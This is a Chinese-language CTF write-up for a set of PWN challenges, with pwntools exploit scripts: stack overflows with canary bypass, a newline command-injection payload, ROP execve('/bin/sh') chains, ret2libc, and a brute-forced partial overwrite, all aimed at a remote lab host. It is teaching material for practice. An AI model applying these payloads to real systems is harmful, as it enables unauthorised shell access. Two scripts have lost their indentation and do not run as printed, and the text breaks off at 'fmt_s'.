PWN

前面几道题比较基础，这里不再赘述。

boom/boom_revenge

# Solver script for boom / boom_revenge.
# Flow: obtain the stack-protector value from a local helper, answer the
# prompt, then send one overflow payload and hand the socket to the user.
from pwn import*
io=remote('61.139.2.1',56079)
#io=process('./boom')

# Runs the local helper "./random" and captures its stdout. "os" is never
# imported here explicitly; it is only available through pwn's star-import.
recv_data=os.popen('./random').read()
# NOTE(review): this strip() result is discarded immediately — the next
# line rebinds the name from the unstripped text, so a trailing newline
# leaves an empty last element. The name "list" also shadows the builtin.
list=recv_data.strip('\n')
list=recv_data.split('\n')

# The helper's first output line is taken as the canary, parsed as decimal.
canary=list[0]
print(int(canary))

io.sendline(b'y')

# 38 repeats of the 4-byte canary value pad the buffer, followed by two
# 8-byte addresses — presumably a ret gadget and the target function;
# confirm both against the binary. p32() truncates if the helper's value
# is wider than 32 bits (cannot tell from here — verify).
payload=p32(int(canary))*38+p64(0x040101a)+p64(0x401276)
io.sendline(payload)

io.interactive()

fmt

简单的格式化字符串题（fmt），一次读、一次写。

%10$p---%7$s

再将第一个泄露值转换成对应的字符串，由于是小端序需要倒过来，依次输入这两个字符串即可获取 shell。

inject

因为没有过滤 \n，用换行符把命令拼接起来即可。

# Solver script for inject.
# The service does not filter newlines, so a second command is appended
# after one (see the prose above).
from pwn import*
io=remote('61.139.2.1',55479)

# Leading "\n" terminates whatever the service builds before it; the rest
# is the text sent as-is. sendline() appends a further newline.
payload=b'\nsh -c sh'
io.sendline(b'4')
io.sendline(payload)

io.interactive()

randomlock

与前面一样，同样是打随机数。

# Solver script for randomlock.
# Same local-helper pattern as boom: "./random" prints the expected
# sequence, and the first ten lines are replayed to the service.
from pwn import*
io=remote('61.139.2.1',63030)

# "os" comes from pwn's star-import; nothing imports it directly here.
recv_data=os.popen('./random').read()
# NOTE(review): the strip() result is discarded by the next line, and
# "list" shadows the builtin; kept as written.
list=recv_data.strip('\n')
list=recv_data.split('\n')

# NOTE(review): the loop body below has lost its indentation on this
# page; as shown it is a syntax error and must be re-indented under the
# for-statement. str() on an already-str element is a no-op.
for i in range(10):
payload=list[i]
io.sendlineafter(b'>',str(payload))

io.interactive()

str_check

strcpy 与 memcpy 的区别：前者遇到 \0 就停止，未必复制满 n 字节；后者总是复制 n 字节。

# Solver script for str_check.
# Exploits the strcpy/memcpy length difference described in the prose:
# the explicit "\x00" bytes are what a strcpy would stop at.
from pwn import*
io=remote('61.139.2.1',54112)

# "meow" plus NUL padding up to 0x28 bytes, then two 8-byte addresses —
# presumably a ret gadget and the target function; confirm in the binary.
payload=b'meow'+b'\x00'*(0x28-4)+p64(0x040101a)+p64(0x401236)

io.sendline(payload)
# Second answer; its meaning is set by the service prompt, not shown here.
io.sendline(b'256')

io.interactive()

syslock

打系统调用

# Solver script for syslock.
# Builds a ROP chain that loads registers and reaches a syscall gadget.
from pwn import*
# arch must be set so cyclic()/p64() use 64-bit conventions.
context.arch='amd64'
io=remote('61.139.2.1',60959)

# Gadget / data addresses taken from the binary (no PIE assumed here —
# these are absolute).
rax=0x0401244
rdi_rsi_rdx=0x0401240
bin_sh=0x0404084
syscall=0x0401230

io.sendafter(b'mode\n',b'-32')

# 0x3b is the amd64 execve syscall number; the string is NUL-terminated
# so it is usable as a C string at bin_sh.
payload=p32(0x3b)+b'/bin/sh\x00'
io.sendafter(b'password\n',payload)

# 0x40+8 bytes of filler reach the return address, then:
# rdi=bin_sh, rsi=0, rdx=0 via the triple-pop gadget, rax=0x3b, syscall.
payload=cyclic(0x40+8)+p64(rdi_rsi_rdx)+p64(bin_sh)+p64(0)+p64(0)+p64(rax)+p64(0x3b)+p64(syscall)
io.sendline(payload)

io.interactive()

xdulaker

开启了 PIE 保护，但程序泄露了 opt 的地址，可以直接由此算出基址。

# Solver script for xdulaker (PIE enabled; base recovered from a leak).
from pwn import*
context.arch='amd64'
io=remote('61.139.2.1',53396)
#io=process('./xdulaker')

# Menu option 1 prints an address; 12 hex digits are read after ":0x".
# NOTE(review): recv(12) returns *up to* 12 bytes; if the service sends
# them in more than one chunk the int() parse is wrong — recvn(12) would
# wait for exactly 12.
io.sendline(b'1')
io.recvuntil(b':0x')
opt=int(io.recv(12),16)
print(hex(opt))
# Offsets of the leaked symbol, the target function and a ret gadget
# relative to the image base — all from the binary, confirm if it changes.
base_addr=opt-0x04010
backdoor=base_addr+0x01249
ret=base_addr+0x0101a

# Option 2: 0x20 bytes of filler then the literal "xdulaker" — presumably
# a string the program compares against; confirm in the binary.
io.sendline(b'2')
payload=cyclic(0x20)+b'xdulaker'
io.sendlineafter(b'name?!',payload)

# Option 3: 0x30+8 bytes reach the return address, then ret (stack
# alignment) and the target.
io.sendline(b'3')
payload=cyclic(0x30+8)+p64(ret)+p64(backdoor)
io.sendlineafter(b'xdulaker',payload)

io.interactive()

ezlibc

简单的ret2libc

# Solver script for ezlibc: a two-stage ret2libc.
# Stage 1 leaks a program address and returns into a function that leaks
# a libc address; stage 2 calls system("/bin/sh").
from pwn import *
# NOTE(review): "elf" is loaded but never used below; only "libc" is read.
elf = ELF('./ezlibc')
libc = ELF('./libc.so.6')
p = remote('61.139.2.1',62108)
p.recvuntil(b'How can I use ')
# 14 bytes of "0x..." text. recv(14) may return fewer bytes than asked;
# recvn(14) would be the exact read if this parse ever fails.
elf_leak = int(p.recv(14),16)
# 0x1060 is the leaked symbol's offset from the image base (from the binary).
elf_base = elf_leak - 0x1060
print('elf base = ',hex(elf_base))
# 0x20 filler, a dummy saved-rbp value, then the program-internal target at
# offset 0x11EE — presumably the function that prints the second leak.
payload = b'a' * 0x20 + p64(0xdeadbeef) + p64(elf_base + 0x11EE)


p.send(payload)
p.recvuntil(b'How can I use ')
leak = int(p.recv(14),16)
print('leak:', hex(leak))
# 0x1147d0 is the leaked libc symbol's offset in the provided libc.so.6.
libc_base = leak - 0x1147d0
print('libc_base:', hex(libc_base))
# Resolve system and a "/bin/sh" string from the shipped libc file.
system = libc_base + libc.symbols['system']
print('system:', hex(system))
binsh = libc_base + next(libc.search(b'/bin/sh'))
print('binsh:', hex(binsh))
# ret (alignment) and pop-rdi gadget offsets in the same libc build.
ret = libc_base + 0x29139
rdi = libc_base + 0x2a3e5

payload = b'a' * 0x20 + p64(0xdeadbeef) + p64(ret) + p64(rdi) + p64(binsh) + p64(system)
p.send(payload)
p.interactive()

ezprotection

# Solver script for ezprotection.
# Leaks the canary, then partially overwrites the return address and
# retries until the service prints the expected marker.
from pwn import*

# NOTE(review): the loop body below has lost its indentation on this
# page; as shown it is a syntax error and must be re-indented under
# "while True:" (and the if/else bodies under their conditions).
while True:
io=remote('61.139.2.1',64627)
# 25 bytes are sent and echoed; the 7 bytes that follow the echo are read
# back. Presumably the write overran the canary's zero low byte so the
# remaining canary bytes are printed — confirm against the binary.
io.send(b'a'*25)
io.recvuntil(b'a'*25)

# Rebuild the 8-byte canary with its low byte restored to zero.
canary=b'\x00'+io.recv(7)
print(canary)


# 0x20-8 filler, canary in place, a dummy saved rbp, then only the low
# two bytes of the return address are overwritten (p16). The unknown
# remaining bits are why this runs in a retry loop (inferred).
payload=cyclic(0x20-8)+canary+p64(0xdeadbeef)+p16(0x127D)
io.send(payload)
# recvall with a 1-second timeout.
out=io.recvall(1)
# Success marker; on miss the connection is closed and a new one opened.
if out.find(b'moectf')!= -1:
print(out)
break
else:
io.close()
continue
io.interactive()

fmt_s